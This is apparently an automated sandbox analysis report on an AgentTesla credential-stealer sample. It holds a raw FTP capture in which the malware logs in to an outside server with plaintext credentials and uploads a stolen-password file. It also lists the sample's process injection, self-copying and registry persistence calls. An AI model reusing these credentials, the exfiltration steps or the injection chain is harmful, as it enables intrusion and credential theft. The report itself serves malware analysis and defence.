                                        Oct 9, 2024 10:51:30.158037901 CEST21497435.2.84.236192.168.2.4331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:30.167351007 CEST4974321192.168.2.45.2.84.236PASS Fineboy777@
                                        Oct 9, 2024 10:51:30.409931898 CEST21497435.2.84.236192.168.2.4230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:30.633862972 CEST21497435.2.84.236192.168.2.4504 Unknown command
                                        Oct 9, 2024 10:51:30.634056091 CEST4974321192.168.2.45.2.84.236PWD
                                        Oct 9, 2024 10:51:30.858278990 CEST21497435.2.84.236192.168.2.4257 "/" is your current location
                                        Oct 9, 2024 10:51:30.858453035 CEST4974321192.168.2.45.2.84.236TYPE I
                                        Oct 9, 2024 10:51:31.082277060 CEST21497435.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:31.082462072 CEST4974321192.168.2.45.2.84.236PASV
                                        Oct 9, 2024 10:51:31.306466103 CEST21497435.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,199,14)
                                        Oct 9, 2024 10:51:31.312442064 CEST4974321192.168.2.45.2.84.236STOR PW_user-618321_2024_10_09_04_51_28.html
                                        Oct 9, 2024 10:51:31.936820030 CEST21497435.2.84.236192.168.2.4150 Accepted data connection
                                        Oct 9, 2024 10:51:32.161956072 CEST21497435.2.84.236192.168.2.4226-File successfully transferred
                                        226-File successfully transferred226 0.225 seconds (measured here), 1.39 Kbytes per second

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:04:50:56
                                        Start date:09/10/2024
                                        Path:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                                        Imagebase:0xf50000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1735614547.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:04:51:02
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xb70000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:04:51:14
                                        Start date:09/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                                        Imagebase:0x370000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 16%, ReversingLabs
                                        • Detection: 26%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:04:51:19
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x5a0000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:04:51:22
                                        Start date:09/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                                        Imagebase:0xcc0000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:04:51:27
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xe10000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11.9%
                                          Dynamic/Decrypted Code Coverage:98.4%
                                          Signature Coverage:2.5%
                                          Total number of Nodes:567
                                          Total number of Limit Nodes:51
                                          execution_graph 64663 192d090 DuplicateHandle 64664 192d126 64663->64664 65283 1924950 65286 19244c4 65283->65286 65285 192495e 65287 19244cf 65286->65287 65290 19245d8 65287->65290 65289 1924a85 65289->65285 65291 19245e3 65290->65291 65294 1924608 65291->65294 65293 1924b62 65293->65289 65295 1924613 65294->65295 65298 1924638 65295->65298 65297 1924c74 65297->65293 65299 1924643 65298->65299 65304 19276fc 65299->65304 65301 1927c99 65301->65297 65302 1927a70 65302->65301 65309 192c768 65302->65309 65305 1927707 65304->65305 65306 192925a 65305->65306 65314 19292b8 65305->65314 65318 19292a8 65305->65318 65306->65302 65310 192c799 65309->65310 65311 192c7bd 65310->65311 65322 192c918 65310->65322 65326 192c928 65310->65326 65311->65301 65315 19292fb 65314->65315 65316 1929306 KiUserCallbackDispatcher 65315->65316 65317 1929330 65315->65317 65316->65317 65317->65306 65319 19292b8 65318->65319 65320 1929330 65319->65320 65321 1929306 KiUserCallbackDispatcher 65319->65321 65320->65306 65321->65320 65323 192c935 65322->65323 65325 192c96f 65323->65325 65330 192b490 65323->65330 65325->65311 65328 192c935 65326->65328 65327 192c96f 65327->65311 65328->65327 65329 192b490 2 API calls 65328->65329 65329->65327 65331 192b495 65330->65331 65333 192d688 65331->65333 65334 192cc94 65331->65334 65333->65333 65335 192cc9f 65334->65335 65336 1924638 2 API calls 65335->65336 65337 192d6f7 65336->65337 65337->65333 64758 6f16f55 64759 6f16f5f 64758->64759 64763 6eed808 64759->64763 64772 6eed818 64759->64772 64760 6f16cc2 64764 6eed818 64763->64764 64765 6eed843 64764->64765 64781 6eee103 64764->64781 64785 6eedf46 64764->64785 64789 6eedf18 64764->64789 64793 6eedc51 64764->64793 64797 6eee0d0 64764->64797 64801 6eedc60 64764->64801 64765->64760 64773 6eed82d 64772->64773 64774 6eedf18 10 API calls 64773->64774 64775 6eedf46 10 API calls 64773->64775 64776 6eed843 64773->64776 64777 6eee103 10 API calls 64773->64777 64778 6eedc60 10 API calls 64773->64778 64779 6eee0d0 10 API calls 64773->64779 64780 6eedc51 10 API calls 64773->64780 64774->64776 64775->64776 64776->64760 64777->64776 64778->64776 64779->64776 64780->64776 64783 6eedcbd 64781->64783 64782 6eedd06 64782->64765 64783->64782 64805 6eef0d2 64783->64805 64786 6eedcbd 64785->64786 64787 6eedd06 64786->64787 64788 6eef0d2 10 API calls 64786->64788 64787->64765 64788->64786 64791 6eedcbd 64789->64791 64790 6eedd06 64790->64765 64791->64790 64792 6eef0d2 10 API calls 64791->64792 64792->64791 64795 6eedc60 64793->64795 64794 6eedd06 64794->64765 64795->64794 64796 6eef0d2 10 API calls 64795->64796 64796->64795 64799 6eedcbd 64797->64799 64798 6eedd06 64798->64765 64799->64798 64800 6eef0d2 10 API calls 64799->64800 64800->64799 64803 6eedc8a 64801->64803 64802 6eedd06 64802->64765 64803->64802 64804 6eef0d2 10 API calls 64803->64804 64804->64803 64806 6eef0f5 64805->64806 64811 6eef50b 64806->64811 64816 6eef593 64806->64816 64821 6eef1d2 64806->64821 64807 6eef117 64807->64783 64812 6eef511 64811->64812 64826 6eef8a8 64812->64826 64867 6eef8b8 64812->64867 64813 6eef19b 64813->64807 64817 6eef520 64816->64817 64818 6eef19b 64816->64818 64819 6eef8a8 10 API calls 64817->64819 64820 6eef8b8 10 API calls 64817->64820 64818->64807 64819->64818 64820->64818 64822 6eef50c 64821->64822 64823 6eef19b 64821->64823 64824 6eef8a8 10 API calls 64822->64824 64825 6eef8b8 10 API calls 64822->64825 64823->64807 64824->64823 64825->64823 64827 6eef8b6 64826->64827 64828 6eef88e 64826->64828 64907 6f40ff6 64827->64907 64912 6f40636 64827->64912 64917 6f40ef5 64827->64917 64925 6f40248 64827->64925 64930 6f40808 64827->64930 64935 6f40e4c 64827->64935 64940 6f4044c 64827->64940 64945 6f40b83 64827->64945 64950 6f40602 64827->64950 64955 6f40040 64827->64955 64960 6f402c0 64827->64960 64965 6f40984 64827->64965 64970 6f40dd9 64827->64970 64975 6f40a1e 64827->64975 64980 6f411de 64827->64980 64985 6f40c1d 64827->64985 64990 6f4061c 64827->64990 64995 6f40bdc 64827->64995 64999 6f40c91 64827->64999 65004 6f40e91 64827->65004 65009 6f40556 64827->65009 65014 6f40895 64827->65014 65018 6f403e9 64827->65018 65023 6f405e8 64827->65023 65028 6f40da3 64827->65028 65033 6f404e2 64827->65033 65038 6f40224 64827->65038 65043 6f407bb 64827->65043 65048 6f4003a 64827->65048 65053 6f40d3e 64827->65053 65058 6f41033 64827->65058 65063 6f410f3 64827->65063 65071 6f402f3 64827->65071 65076 6f40fb1 64827->65076 65081 6f402b1 64827->65081 65086 6f405b0 64827->65086 65091 6f40df6 64827->65091 64828->64813 64829 6eef8ef 64829->64813 64868 6eef8cd 64867->64868 64870 6f40ef5 4 API calls 64868->64870 64871 6f40636 2 API calls 64868->64871 64872 6f40ff6 2 API calls 64868->64872 64873 6f40df6 2 API calls 64868->64873 64874 6f405b0 2 API calls 64868->64874 64875 6f402b1 2 API calls 64868->64875 64876 6f40fb1 2 API calls 64868->64876 64877 6f402f3 2 API calls 64868->64877 64878 6f410f3 4 API calls 64868->64878 64879 6f41033 2 API calls 64868->64879 64880 6f40d3e 2 API calls 64868->64880 64881 6f4003a 2 API calls 64868->64881 64882 6f407bb 2 API calls 64868->64882 64883 6f40224 2 API calls 64868->64883 64884 6f404e2 2 API calls 64868->64884 64885 6f40da3 2 API calls 64868->64885 64886 6f405e8 2 API calls 64868->64886 64887 6f403e9 2 API calls 64868->64887 64888 6f40895 2 API calls 64868->64888 64889 6f40556 2 API calls 64868->64889 64890 6f40e91 2 API calls 64868->64890 64891 6f40c91 2 API calls 64868->64891 64892 6f40bdc 2 API calls 64868->64892 64893 6f4061c 2 API calls 64868->64893 64894 6f40c1d 2 API calls 64868->64894 64895 6f411de 2 API calls 64868->64895 64896 6f40a1e 2 API calls 64868->64896 64897 6f40dd9 2 API calls 64868->64897 64898 6f40984 2 API calls 64868->64898 64899 6f402c0 2 API calls 64868->64899 64900 6f40040 2 API calls 64868->64900 64901 6f40602 2 API calls 64868->64901 64902 6f40b83 2 API calls 64868->64902 64903 6f4044c 2 API calls 64868->64903 64904 6f40e4c 2 API calls 64868->64904 64905 6f40808 2 API calls 64868->64905 64906 6f40248 2 API calls 64868->64906 64869 6eef8ef 64869->64813 64870->64869 64871->64869 64872->64869 64873->64869 64874->64869 64875->64869 64876->64869 64877->64869 64878->64869 64879->64869 64880->64869 64881->64869 64882->64869 64883->64869 64884->64869 64885->64869 64886->64869 64887->64869 64888->64869 64889->64869 64890->64869 64891->64869 64892->64869 64893->64869 64894->64869 64895->64869 64896->64869 64897->64869 64898->64869 64899->64869 64900->64869 64901->64869 64902->64869 64903->64869 64904->64869 64905->64869 64906->64869 64909 6f400be 64907->64909 64908 6f4013b 64908->64829 64909->64908 65096 6ee3518 64909->65096 65100 6ee3520 64909->65100 64913 6f4064e 64912->64913 65104 6f41620 64913->65104 65109 6f41610 64913->65109 64914 6f40666 64918 6f40f0c 64917->64918 65132 6ee3368 64918->65132 65136 6ee3370 64918->65136 64919 6f4013b 64919->64829 64920 6f400be 64920->64919 64921 6ee3518 NtResumeThread 64920->64921 64922 6ee3520 NtResumeThread 64920->64922 64921->64920 64922->64920 64927 6f400be 64925->64927 64926 6f4013b 64926->64829 64927->64926 64928 6ee3518 NtResumeThread 64927->64928 64929 6ee3520 NtResumeThread 64927->64929 64928->64927 64929->64927 64931 6f40812 64930->64931 65140 6f42d61 64931->65140 65145 6f42d68 64931->65145 64932 6f40872 64937 6f400be 64935->64937 64936 6f4013b 64936->64829 64937->64936 64938 6ee3518 NtResumeThread 64937->64938 64939 6ee3520 NtResumeThread 64937->64939 64938->64937 64939->64937 64941 6f400be 64940->64941 64942 6f4013b 64941->64942 64943 6ee3518 NtResumeThread 64941->64943 64944 6ee3520 NtResumeThread 64941->64944 64942->64829 64943->64941 64944->64941 64947 6f400be 64945->64947 64946 6f4013b 64946->64829 64947->64946 64948 6ee3518 NtResumeThread 64947->64948 64949 6ee3520 NtResumeThread 64947->64949 64948->64947 64949->64947 64951 6f4060c 64950->64951 64953 6f42d61 2 API calls 64951->64953 64954 6f42d68 2 API calls 64951->64954 64952 6f40872 64952->64952 64953->64952 64954->64952 64957 6f40073 64955->64957 64956 6f4013b 64956->64829 64957->64956 64958 6ee3518 NtResumeThread 64957->64958 64959 6ee3520 NtResumeThread 64957->64959 64958->64957 64959->64957 64962 6f400be 64960->64962 64961 6f4013b 64961->64829 64962->64961 64963 6ee3518 NtResumeThread 64962->64963 64964 6ee3520 NtResumeThread 64962->64964 64963->64962 64964->64962 64967 6f400be 64965->64967 64966 6f4013b 64966->64829 64967->64966 64968 6ee3518 NtResumeThread 64967->64968 64969 6ee3520 NtResumeThread 64967->64969 64968->64967 64969->64967 64971 6f400be 64970->64971 64972 6f4013b 64971->64972 64973 6ee3518 NtResumeThread 64971->64973 64974 6ee3520 NtResumeThread 64971->64974 64972->64829 64973->64971 64974->64971 64976 6f40a3e 64975->64976 64978 6ee3368 WriteProcessMemory 64976->64978 64979 6ee3370 WriteProcessMemory 64976->64979 64977 6f40a89 64978->64977 64979->64977 64981 6f400be 64980->64981 64982 6f4013b 64981->64982 64983 6ee3518 NtResumeThread 64981->64983 64984 6ee3520 NtResumeThread 64981->64984 64982->64829 64983->64981 64984->64981 64987 6f400be 64985->64987 64986 6f4013b 64986->64829 64987->64986 64988 6ee3518 NtResumeThread 64987->64988 64989 6ee3520 NtResumeThread 64987->64989 64988->64987 64989->64987 64991 6f40626 64990->64991 64993 6f42d61 2 API calls 64991->64993 64994 6f42d68 2 API calls 64991->64994 64992 6f40872 64992->64992 64993->64992 64994->64992 65158 6f42ea0 64995->65158 65163 6f42e9f 64995->65163 64996 6f40bf4 65001 6f400be 64999->65001 65000 6f4013b 65000->64829 65001->65000 65002 6ee3518 NtResumeThread 65001->65002 65003 6ee3520 NtResumeThread 65001->65003 65002->65001 65003->65001 65006 6f400be 65004->65006 65005 6f4013b 65005->64829 65006->65005 65007 6ee3518 NtResumeThread 65006->65007 65008 6ee3520 NtResumeThread 65006->65008 65007->65006 65008->65006 65011 6f400be 65009->65011 65010 6f4013b 65010->64829 65011->65010 65012 6ee3518 NtResumeThread 65011->65012 65013 6ee3520 NtResumeThread 65011->65013 65012->65011 65013->65011 65176 6f42cd0 65014->65176 65181 6f42cc0 65014->65181 65015 6f408ad 65020 6f400be 65018->65020 65019 6f4013b 65019->64829 65020->65019 65021 6ee3518 NtResumeThread 65020->65021 65022 6ee3520 NtResumeThread 65020->65022 65021->65020 65022->65020 65024 6f400be 65023->65024 65025 6f4013b 65024->65025 65026 6ee3518 NtResumeThread 65024->65026 65027 6ee3520 NtResumeThread 65024->65027 65025->64829 65026->65024 65027->65024 65029 6f400be 65028->65029 65030 6f4013b 65029->65030 65031 6ee3518 NtResumeThread 65029->65031 65032 6ee3520 NtResumeThread 65029->65032 65030->64829 65031->65029 65032->65029 65034 6f400be 65033->65034 65035 6f4013b 65034->65035 65036 6ee3518 NtResumeThread 65034->65036 65037 6ee3520 NtResumeThread 65034->65037 65035->64829 65036->65034 65037->65034 65040 6f400be 65038->65040 65039 6f4013b 65039->64829 65040->65039 65041 6ee3518 NtResumeThread 65040->65041 65042 6ee3520 NtResumeThread 65040->65042 65041->65040 65042->65040 65045 6f400be 65043->65045 65044 6f4013b 65044->64829 65045->65043 65045->65044 65046 6ee3518 NtResumeThread 65045->65046 65047 6ee3520 NtResumeThread 65045->65047 65046->65045 65047->65045 65050 6f40040 65048->65050 65049 6f4013b 65049->64829 65050->65049 65051 6ee3518 NtResumeThread 65050->65051 65052 6ee3520 NtResumeThread 65050->65052 65051->65050 65052->65050 65054 6f400be 65053->65054 65055 6f4013b 65054->65055 65056 6ee3518 NtResumeThread 65054->65056 65057 6ee3520 NtResumeThread 65054->65057 65055->64829 65056->65054 65057->65054 65060 6f400be 65058->65060 65059 6f4013b 65059->64829 65060->65059 65061 6ee3518 NtResumeThread 65060->65061 65062 6ee3520 NtResumeThread 65060->65062 65061->65060 65062->65060 65064 6f4110d 65063->65064 65069 6ee3368 WriteProcessMemory 65064->65069 65070 6ee3370 WriteProcessMemory 65064->65070 65065 6f4013b 65065->64829 65066 6f400be 65066->65065 65067 6ee3518 NtResumeThread 65066->65067 65068 6ee3520 NtResumeThread 65066->65068 65067->65066 65068->65066 65069->65066 65070->65066 65072 6f400be 65071->65072 65073 6f4013b 65072->65073 65074 6ee3518 NtResumeThread 65072->65074 65075 6ee3520 NtResumeThread 65072->65075 65073->64829 65074->65072 65075->65072 65077 6f400be 65076->65077 65078 6f4013b 65077->65078 65079 6ee3518 NtResumeThread 65077->65079 65080 6ee3520 NtResumeThread 65077->65080 65078->64829 65079->65077 65080->65077 65083 6f400be 65081->65083 65082 6f4013b 65082->64829 65083->65082 65084 6ee3518 NtResumeThread 65083->65084 65085 6ee3520 NtResumeThread 65083->65085 65084->65083 65085->65083 65088 6f400be 65086->65088 65087 6f4013b 65087->64829 65088->65087 65089 6ee3518 NtResumeThread 65088->65089 65090 6ee3520 NtResumeThread 65088->65090 65089->65088 65090->65088 65093 6f400be 65091->65093 65092 6f4013b 65092->64829 65093->65092 65094 6ee3518 NtResumeThread 65093->65094 65095 6ee3520 NtResumeThread 65093->65095 65094->65093 65095->65093 65097 6ee3520 NtResumeThread 65096->65097 65099 6ee359d 65097->65099 65099->64909 65101 6ee3568 NtResumeThread 65100->65101 65103 6ee359d 65101->65103 65103->64909 65105 6f41637 65104->65105 65106 6f41659 65105->65106 65114 6f41b73 65105->65114 65119 6f41bcf 65105->65119 65106->64914 65110 6f41620 65109->65110 65111 6f41659 65110->65111 65112 6f41b73 2 API calls 65110->65112 65113 6f41bcf 2 API calls 65110->65113 65111->64914 65112->65111 65113->65111 65115 6f41b7c 65114->65115 65124 6ee2b46 65115->65124 65128 6ee2b50 65115->65128 65120 6f41bf7 65119->65120 65122 6ee2b46 CreateProcessA 65120->65122 65123 6ee2b50 CreateProcessA 65120->65123 65121 6f41723 65122->65121 65123->65121 65125 6ee2b50 CreateProcessA 65124->65125 65127 6ee2d3c 65125->65127 65129 6ee2bb4 65128->65129 65129->65129 65130 6ee2cf4 CreateProcessA 65129->65130 65131 6ee2d3c 65130->65131 65133 6ee3370 WriteProcessMemory 65132->65133 65135 6ee340f 65133->65135 65135->64920 65137 6ee33b8 WriteProcessMemory 65136->65137 65139 6ee340f 65137->65139 65139->64920 65141 6f42d66 65140->65141 65150 6ee3269 65141->65150 65154 6ee3270 65141->65154 65142 6f42d9f 65142->64932 65146 6f42d7d 65145->65146 65148 6ee3269 VirtualAllocEx 65146->65148 65149 6ee3270 VirtualAllocEx 65146->65149 65147 6f42d9f 65147->64932 65148->65147 65149->65147 65151 6ee3270 VirtualAllocEx 65150->65151 65153 6ee32ed 65151->65153 65153->65142 65155 6ee32b0 VirtualAllocEx 65154->65155 65157 6ee32ed 65155->65157 65157->65142 65159 6f42eb5 65158->65159 65168 6ee2e4a 65159->65168 65172 6ee2e50 65159->65172 65160 6f42ece 65160->64996 65164 6f42ea0 65163->65164 65166 6ee2e4a Wow64SetThreadContext 65164->65166 65167 6ee2e50 Wow64SetThreadContext 65164->65167 65165 6f42ece 65165->64996 65166->65165 65167->65165 65169 6ee2e50 Wow64SetThreadContext 65168->65169 65171 6ee2edd 65169->65171 65171->65160 65173 6ee2e95 Wow64SetThreadContext 65172->65173 65175 6ee2edd 65173->65175 65175->65160 65177 6f42ce5 65176->65177 65179 6ee2e4a Wow64SetThreadContext 65177->65179 65180 6ee2e50 Wow64SetThreadContext 65177->65180 65178 6f42cfe 65178->65015 65179->65178 65180->65178 65182 6f42cd0 65181->65182 65184 6ee2e4a Wow64SetThreadContext 65182->65184 65185 6ee2e50 Wow64SetThreadContext 65182->65185 65183 6f42cfe 65183->65015 65184->65183 65185->65183 65186 192a6b8 65190 192a7b0 65186->65190 65195 192a7a1 65186->65195 65187 192a6c7 65191 192a7e4 65190->65191 65192 192a7c1 65190->65192 65191->65187 65192->65191 65193 192a9e8 GetModuleHandleW 65192->65193 65194 192aa15 65193->65194 65194->65187 65196 192a7e4 65195->65196 65197 192a7c1 65195->65197 65196->65187 65197->65196 65198 192a9e8 GetModuleHandleW 65197->65198 65199 192aa15 65198->65199 65199->65187 65374 6f5a11f 65376 6f5d1d0 VirtualProtect 65374->65376 65375 6f501e5 65376->65375 65338 6f52138 65339 6f52157 65338->65339 65341 6f5d1d0 VirtualProtect 65339->65341 65340 6f5217e 65341->65340 65200 6f173df 65201 6f173e9 65200->65201 65205 6ee9162 65201->65205 65212 6ee9160 65201->65212 65202 6f17427 65206 6ee9175 65205->65206 65207 6ee918b 65206->65207 65219 6eea45b 65206->65219 65224 6eeac71 65206->65224 65229 6ee9dd6 65206->65229 65234 6ee9fdb 65206->65234 65207->65202 65213 6ee9175 65212->65213 65214 6ee918b 65213->65214 65215 6eea45b 2 API calls 65213->65215 65216 6ee9fdb 2 API calls 65213->65216 65217 6ee9dd6 2 API calls 65213->65217 65218 6eeac71 2 API calls 65213->65218 65214->65202 65215->65214 65216->65214 65217->65214 65218->65214 65220 6eea47c 65219->65220 65239 6eecee8 65220->65239 65244 6eecef8 65220->65244 65225 6eeaca8 65224->65225 65257 6ee4c3c 65225->65257 65261 6ee4c48 65225->65261 65230 6ee9d1e 65229->65230 65231 6eea461 65229->65231 65232 6eecee8 2 API calls 65231->65232 65233 6eecef8 2 API calls 65231->65233 65232->65230 65233->65230 65235 6ee9fe1 65234->65235 65236 6eea134 65235->65236 65265 6eecdc8 65235->65265 65270 6eecdd8 65235->65270 65240 6eecef8 65239->65240 65249 6ee49f5 65240->65249 65253 6ee4a00 65240->65253 65245 6eecf0d 65244->65245 65247 6ee49f5 CopyFileA 65245->65247 65248 6ee4a00 CopyFileA 65245->65248 65246 6ee9d1e 65247->65246 65248->65246 65250 6ee4a00 65249->65250 65250->65250 65251 6ee4b24 CopyFileA 65250->65251 65252 6ee4b57 65251->65252 65254 6ee4a55 CopyFileA 65253->65254 65256 6ee4b57 65254->65256 65258 6ee4c48 RegOpenKeyExA 65257->65258 65260 6ee4d45 65258->65260 65262 6ee4ca3 65261->65262 65262->65262 65263 6ee4d0e RegOpenKeyExA 65262->65263 65264 6ee4d45 65263->65264 65266 6eecdd8 65265->65266 65275 6ee4e05 65266->65275 65279 6ee4e10 65266->65279 65271 6eecded 65270->65271 65273 6ee4e05 RegSetValueExA 65271->65273 65274 6ee4e10 RegSetValueExA 65271->65274 65272 6eece12 65272->65235 65273->65272 65274->65272 65276 6ee4e10 RegSetValueExA 65275->65276 65278 6ee4f24 65276->65278 65280 6ee4e6b RegSetValueExA 65279->65280 65282 6ee4f24 65280->65282 65342 6f172be 65343 6f172c8 65342->65343 65347 6ee5278 65343->65347 65351 6ee5269 65343->65351 65344 6f17306 65348 6ee528d 